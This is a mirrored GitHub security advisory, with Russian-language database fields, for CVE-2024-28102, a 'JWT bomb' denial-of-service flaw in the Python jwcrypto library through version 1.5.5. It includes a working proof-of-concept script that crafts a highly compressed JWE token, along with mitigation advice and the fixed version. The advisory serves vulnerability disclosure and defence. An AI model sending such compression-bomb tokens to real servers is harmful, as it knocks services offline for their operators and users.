GHSA-j857-7rvv-vj97

Опубликовано: 06 мар. 2024

Источник: github

Github: Прошло ревью

CVSS3: 6.8

Описание

JWCrypto vulnerable to JWT bomb Attack in deserialize function

Affected version

Vendor: https://github.com/latchset/jwcrypto Version: 1.5.5

Description

An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this Token, it will consume a lot of memory and processing time.

Poc

from jwcrypto import jwk, jwe from jwcrypto.common import json_encode, json_decode import time public_key = jwk.JWK() private_key = jwk.JWK.generate(kty='RSA', size=2048) public_key.import_key(**json_decode(private_key.export_public())) payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}' protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "zip": "DEF", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode('utf-8'), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True) print("-----uncompress-----") print(len(enc)) begin = time.time() jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key) print(time.time() - begin) print("-----compress-----") payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}' protected_header = { "alg": "RSA-OAEP-256", "enc": "A256CBC-HS512", "typ": "JWE", "kid": public_key.thumbprint(), } jwetoken = jwe.JWE(payload.encode('utf-8'), recipient=public_key, protected=protected_header) enc = jwetoken.serialize(compact=True) print(len(enc)) begin = time.time() jwetoken = jwe.JWE() jwetoken.deserialize(enc, key=private_key) print(time.time() - begin)

It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.

Mitigation

To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing attackers from exploiting this vulnerability with high compression ratio tokens.

References

[1] CVE-2024-21319

Ссылки

Пакеты

Наименование

jwcrypto

pip

Затронутые версииВерсия исправления

<= 1.5.5

1.5.6

EPSS

Процентиль: 29%

0.00103

Низкий

6.8 Medium

CVSS3

CVE ID

CVE-2024-28102

Дефекты

CWE-770

Связанные уязвимости

CVE-2024-28102

CVSS3: 6.8

ubuntu

больше 1 года назад

JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.